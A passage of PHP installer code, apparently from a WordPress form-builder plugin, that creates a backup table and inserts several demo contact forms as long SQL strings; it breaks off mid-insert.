  $wpdb->query($formmaker_query);
  
  $formmaker_backup = "CREATE TABLE IF NOT EXISTS `" . $wpdb->prefix . "formmaker_backup` (
	  `backup_id` int(11) NOT NULL AUTO_INCREMENT,
	  `cur` int(1) NOT NULL,
	  `id` int(11) NOT NULL,
	  `title` varchar(127) NOT NULL,
	  `mail` varchar(128) NOT NULL,
	  `form_front` longtext NOT NULL,
	  `theme` int(11) NOT NULL,
	  `javascript` text NOT NULL,
	  `submit_text` longtext NOT NULL,
	  `url` varchar(200) NOT NULL,
	  `submit_text_type` tinyint(4) NOT NULL,
	  `script_mail` text NOT NULL,
	  `script_mail_user` text NOT NULL,
	  `counter` int(11) NOT NULL,
	  `published` int(11) NOT NULL DEFAULT '1',
	  `label_order` text NOT NULL,
	  `label_order_current` text NOT NULL,
	  `article_id` varchar(500) NOT NULL,
	  `pagination` varchar(128) NOT NULL,
	  `show_title` varchar(128) NOT NULL,
	  `show_numbers` varchar(128) NOT NULL,
	  `public_key` varchar(50) NOT NULL,
	  `private_key` varchar(50) NOT NULL,
	  `recaptcha_theme` varchar(20) NOT NULL,
	  `paypal_mode` int(2) NOT NULL,
	  `checkout_mode` varchar(20) NOT NULL,
	  `paypal_email` varchar(50) NOT NULL,
	  `payment_currency` varchar(20) NOT NULL,
	  `tax` float NOT NULL,
	  `form_fields` longtext NOT NULL,
	  `savedb` tinyint(4) NOT NULL DEFAULT '1',
	  `sendemail` tinyint(4) NOT NULL DEFAULT '1',
	  `requiredmark` varchar(20) NOT NULL DEFAULT '*',
	  `from_mail` varchar(128) NOT NULL,
	  `from_name` varchar(128) NOT NULL,
	  `reply_to` varchar(128) NOT NULL,
	  `send_to` varchar(128) NOT NULL,
	  `autogen_layout` tinyint(4) NOT NULL DEFAULT '1',
	  `custom_front` longtext NOT NULL,
	  `mail_from_user` varchar(128) NOT NULL,
	  `mail_from_name_user` varchar(128) NOT NULL,
	  `reply_to_user` varchar(128) NOT NULL,
	  `condition` text NOT NULL,
	  `mail_cc` varchar(128) NOT NULL,
	  `mail_cc_user` varchar(128) NOT NULL,
	  `mail_bcc` varchar(128) NOT NULL,
	  `mail_bcc_user` varchar(128) NOT NULL,
	  `mail_subject` varchar(128) NOT NULL,
	  `mail_subject_user` varchar(128) NOT NULL,
	  `mail_mode` tinyint(4) NOT NULL DEFAULT '1',
	  `mail_mode_user` tinyint(4) NOT NULL DEFAULT '1',
	  `mail_attachment` tinyint(4) NOT NULL DEFAULT '1',
	  `mail_attachment_user` tinyint(4) NOT NULL DEFAULT '1',
	  `user_id_wd` varchar(220) NOT NULL,
	  `sortable` int(11) NOT NULL,
	  `frontend_submit_fields` text NOT NULL,
	  `frontend_submit_stat_fields` text NOT NULL,
	  `mail_emptyfields` tinyint(4) NOT NULL DEFAULT '0',
	  `mail_verify` tinyint(4) NOT NULL DEFAULT '0',
	  `mail_verify_expiretime` float NOT NULL,
	  `mail_verification_post_id` int(11) NOT NULL,
	  `save_uploads` tinyint(4) NOT NULL DEFAULT '1',
	  PRIMARY KEY (`backup_id`)
	) ENGINE=InnoDB  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;";
    $wpdb->query($formmaker_backup);

  
  return;
}

function install_demo_forms_fmc() {
  global $wpdb;
  $form_maker_row = $wpdb->get_var("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE `id` IN (" . (get_option('contact_form_forms', '') != '' ? get_option('contact_form_forms') : 0) . ")");
  if (!$form_maker_row) {
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'Contact Us with Captcha\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - custom_1%</div><div wdid="2" class="wdform_row">%2 - Name:%</div><div wdid="3" class="wdform_row">%3 - E-mail:%</div><div wdid="4" class="wdform_row">%4 - Comments:%</div><div wdid="5" class="wdform_row">%5 - Type the characters you see here:%</div><div wdid="6" class="wdform_row">%6 - type_submit_reset_6%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'3\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'7\',\'1\',\'1#**id**#custom_1#**label**#type_editor#****#2#**id**#Name:#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Comments:#**label**#type_textarea#****#5#**id**#Type the characters you see here:#**label**#type_captcha#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****##**id**##**label**##****#\',\'1#**id**#custom_1#**label**#type_editor#****#2#**id**#Name:#**label**#type_name#****#3#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Comments:#**label**#type_textarea#****#5#**id**#Type the characters you see here:#**label**#type_captcha#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<div><h2>Contact Us</h2><div>Please contact us for specific reasons.</div></div><p></p>*:*w_editor*:**:*new_field*:*2*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:*ex: myname@example.com*:*w_first_val*:*ex: myname@example.com*:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_captcha*:*type*:*Type the characters you see here:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*6*:*w_digit*:**:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', $insert_form_id);
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'Tell a Friend\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - custom_1%</div></div></div><div wdid="2" type="type_section_break" class="wdform_tr_section_break">%2 - custom_2%</div><div class="wdform_section"><div class="wdform_column"><div wdid="3" class="wdform_row">%3 - From:%</div><div wdid="4" class="wdform_row">%4 - To:%</div><div wdid="5" class="wdform_row">%5 - Message:%</div><div wdid="6" class="wdform_row">%6 - type_submit_reset_6%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'3\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'7\',\'1\',\'1#**id**#custom_1#**label**#type_editor#****#3#**id**#From:#**label**#type_text#****#4#**id**#To:#**label**#type_text#****#5#**id**#Message:#**label**#type_textarea#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****##**id**##**label**##****#\',\'1#**id**#custom_1#**label**#type_editor#****#3#**id**#From:#**label**#type_text#****#4#**id**#To:#**label**#type_text#****#5#**id**#Message:#**label**#type_textarea#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_editor*:*type*:*custom_1*:*w_field_label*:*<h1>Tell a Friend</h1>*:*w_editor*:**:*new_field*:*2*:*id*:*type_section_break*:*type*:*custom_2*:*w_field_label*:*<div class="wdform-section-break-div" style="min-width: 300px; border-top:1px solid"></div>*:*w_editor*:**:*new_field*:*3*:*id*:*type_text*:*type*:*From:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_text*:*type*:*To:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*5*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', get_option('contact_form_forms', FALSE) . ',' . $insert_form_id);
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'Simple Contact\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Name:%</div><div wdid="2" class="wdform_row">%2 - E-mail:%</div><div wdid="3" class="wdform_row">%3 - Website%</div><div wdid="4" class="wdform_row">%4 - type_submit_reset_4%</div></div><div class="wdform_column"><div wdid="5" class="wdform_row">%5 - Message:%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'1\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'6\',\'1\',\'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Website#**label**#type_text#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Message:#**label**#type_textarea#****##**id**##**label**##****#\',\'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Website#**label**#type_text#****#4#**id**#type_submit_reset_4#**label**#type_submit_reset#****#5#**id**#Message:#**label**#type_textarea#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Website*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_submit_reset*:*type*:*type_submit_reset_4*:*w_field_label*:*Send Now!*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*5*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', get_option('contact_form_forms', FALSE) . ',' . $insert_form_id);
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'Advanced Contact Form 2\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - First Name:%</div><div wdid="2" class="wdform_row">%2 - custom_2%</div><div wdid="3" class="wdform_row">%3 - Last Name:%</div><div wdid="4" class="wdform_row">%4 - custom_4%</div><div wdid="5" class="wdform_row">%5 - E-mail Address:%</div><div wdid="6" class="wdform_row">%6 - custom_6%</div><div wdid="7" class="wdform_row">%7 - Company / Restaurant Name:%</div><div wdid="8" class="wdform_row">%8 - custom_8%</div><div wdid="9" class="wdform_row">%9 - Telephone:%</div><div wdid="10" class="wdform_row">%10 - custom_10%</div><div wdid="11" class="wdform_row">%11 - Alternate Telephone:%</div><div wdid="12" class="wdform_row">%12 - custom_12%</div><div wdid="13" class="wdform_row">%13 - Requirements/ Comments:%</div><div wdid="14" class="wdform_row">%14 - custom_14%</div><div wdid="15" class="wdform_row">%15 - How Did You Hear About Us?%</div><div wdid="16" class="wdform_row">%16 - custom_16%</div><div wdid="17" class="wdform_row">%17 - custom_17%</div><div wdid="18" class="wdform_row">%18 - type_submit_reset_18%</div><div wdid="19" class="wdform_row">%19 - custom_19%</div><div wdid="20" class="wdform_row">%20 - custom_20%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'17\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'21\',\'1\',\'1#**id**#First Name:#**label**#type_text#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Last Name:#**label**#type_text#****#4#**id**#custom_4#**label**#type_editor#****#5#**id**#E-mail Address:#**label**#type_submitter_mail#****#6#**id**#custom_6#**label**#type_editor#****#7#**id**#Company / Restaurant Name:#**label**#type_text#****#8#**id**#custom_8#**label**#type_editor#****#9#**id**#Telephone:#**label**#type_text#****#10#**id**#custom_10#**label**#type_editor#****#11#**id**#Alternate Telephone:#**label**#type_text#****#12#**id**#custom_12#**label**#type_editor#****#13#**id**#Requirements/ Comments:#**label**#type_textarea#****#14#**id**#custom_14#**label**#type_editor#****#15#**id**#How Did You Hear About Us?#**label**#type_text#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#type_submit_reset_18#**label**#type_submit_reset#****#19#**id**#custom_19#**label**#type_editor#****#20#**id**#custom_20#**label**#type_editor#****##**id**##**label**##****#\',\'1#**id**#First Name:#**label**#type_text#****#2#**id**#custom_2#**label**#type_editor#****#3#**id**#Last Name:#**label**#type_text#****#4#**id**#custom_4#**label**#type_editor#****#5#**id**#E-mail Address:#**label**#type_submitter_mail#****#6#**id**#custom_6#**label**#type_editor#****#7#**id**#Company / Restaurant Name:#**label**#type_text#****#8#**id**#custom_8#**label**#type_editor#****#9#**id**#Telephone:#**label**#type_text#****#10#**id**#custom_10#**label**#type_editor#****#11#**id**#Alternate Telephone:#**label**#type_text#****#12#**id**#custom_12#**label**#type_editor#****#13#**id**#Requirements/ Comments:#**label**#type_textarea#****#14#**id**#custom_14#**label**#type_editor#****#15#**id**#How Did You Hear About Us?#**label**#type_text#****#16#**id**#custom_16#**label**#type_editor#****#17#**id**#custom_17#**label**#type_editor#****#18#**id**#type_submit_reset_18#**label**#type_submit_reset#****#19#**id**#custom_19#**label**#type_editor#****#20#**id**#custom_20#**label**#type_editor#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_text*:*type*:*First Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_editor*:*type*:*custom_2*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Last Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_editor*:*type*:*custom_4*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*5*:*id*:*type_submitter_mail*:*type*:*E-mail Address:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*6*:*id*:*type_editor*:*type*:*custom_6*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*7*:*id*:*type_text*:*type*:*Company / Restaurant Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*8*:*id*:*type_editor*:*type*:*custom_8*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*9*:*id*:*type_text*:*type*:*Telephone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*10*:*id*:*type_editor*:*type*:*custom_10*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*11*:*id*:*type_text*:*type*:*Alternate Telephone:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*12*:*id*:*type_editor*:*type*:*custom_12*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*13*:*id*:*type_textarea*:*type*:*Requirements/ Comments:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*14*:*id*:*type_editor*:*type*:*custom_14*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*15*:*id*:*type_text*:*type*:*How Did You Hear About Us?*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*16*:*id*:*type_editor*:*type*:*custom_16*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*17*:*id*:*type_editor*:*type*:*custom_17*:*w_field_label*:** Indicates required fields*:*w_editor*:**:*new_field*:*18*:*id*:*type_submit_reset*:*type*:*type_submit_reset_18*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*19*:*id*:*type_editor*:*type*:*custom_19*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*20*:*id*:*type_editor*:*type*:*custom_20*:*w_field_label*:*<br>*:*w_editor*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', get_option('contact_form_forms', FALSE) . ',' . $insert_form_id);
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'Simple Contact with Phone\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Name:%</div><div wdid="2" class="wdform_row">%2 - E-mail:%</div><div wdid="3" class="wdform_row">%3 - Phone:%</div><div wdid="4" class="wdform_row">%4 - Message:%</div><div wdid="5" class="wdform_row">%5 - type_submit_reset_5%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'25\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'6\',\'1\',\'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#Message:#**label**#type_textarea#****#5#**id**#type_submit_reset_5#**label**#type_submit_reset#****##**id**##**label**##****#\',\'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Phone:#**label**#type_phone#****#4#**id**#Message:#**label**#type_textarea#****#5#**id**#type_submit_reset_5#**label**#type_submit_reset#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_phone*:*type*:*Phone:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*135*:*w_size*:*****:*w_first_val*:*****:*w_title*:*Area Code***Phone Number*:*w_mini_labels*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_submit_reset*:*type*:*type_submit_reset_5*:*w_field_label*:*Submit Form*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*\',\'1\',\'1\',\'*\',\'\',\'\',\'\',\'\',\'1\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'\',\'1\',\'1\',\'1\',\'1\',\'administrator,\',1,\'\',\'\', 0, 0, 0 , 0, 1)');
    $insert_form_id = $wpdb->get_var('SELECT MAX(id) FROM `' . $wpdb->prefix . 'formmaker`');
    update_option('contact_form_forms', get_option('contact_form_forms', FALSE) . ',' . $insert_form_id);
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker` VALUES(NULL,\'User Credentials\',\'\',\'<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Name:%</div></div></div><div wdid="2" type="type_section_break" class="wdform_tr_section_break">%2 - custom_2%</div><div class="wdform_section"><div class="wdform_column"><div wdid="3" class="wdform_row">%3 - custom_3%</div></div></div><div wdid="4" type="type_section_break" class="wdform_tr_section_break">%4 - custom_4%</div><div class="wdform_section"><div class="wdform_column"><div wdid="5" class="wdform_row">%5 - E-mail:%</div><div wdid="6" class="wdform_row">%6 - Phone:%</div><div wdid="7" class="wdform_row">%7 - Mobile Phone Number:%</div><div wdid="8" class="wdform_row">%8 - Address:%</div><div wdid="14" class="wdform_row">%14 - Message Inquiry / Comments:%</div><div wdid="15" class="wdform_row">%15 - type_submit_reset_15%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>\',\'34\',\'// before form is load\r\nfunction before_load() {	\r\n}	\r\n//before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}\',\'\',\'\',\'0\',\'%all%\',\'%all%\',\'16\',\'1\',\'1#**id**#Name:#**label**#type_name#****#3#**id**#custom_3#**label**#type_editor#****#5#**id**#E-mail:#**label**#type_submitter_mail#****#6#**id**#Phone:#**label**#type_phone#****#7#**id**#Mobile Phone Number:#**label**#type_phone#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Message Inquiry / Comments:#**label**#type_textarea#****#15#**id**#type_submit_reset_15#**label**#type_submit_reset#****##**id**##**label**##****#\',\'1#**id**#Name:#**label**#type_name#****#3#**id**#custom_3#**label**#type_editor#****#5#**id**#E-mail:#**label**#type_submitter_mail#****#6#**id**#Phone:#**label**#type_phone#****#7#**id**#Mobile Phone Number:#**label**#type_phone#****#8#**id**#Street Address#**label**#type_address#****#9#**id**#Street Address Line 2#**label**#type_address#****#10#**id**#City#**label**#type_address#****#11#**id**#State / Province / Region#**label**#type_address#****#12#**id**#Postal / Zip Code#**label**#type_address#****#13#**id**#Country#**label**#type_address#****#14#**id**#Message Inquiry / Comments:#**label**#type_textarea#****#15#**id**#type_submit_reset_15#**label**#type_submit_reset#****#\',\'0\',\'none\',\'false\',\'true\',\'\',\'\',\'\',\'0\',\'testmode\',\'\',\'\',\'0\',\'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_section_break*:*type*:*custom_2*:*w_field_label*:*<div class="wdform-section-break-div" style="min-width: 300px; border-top:1px 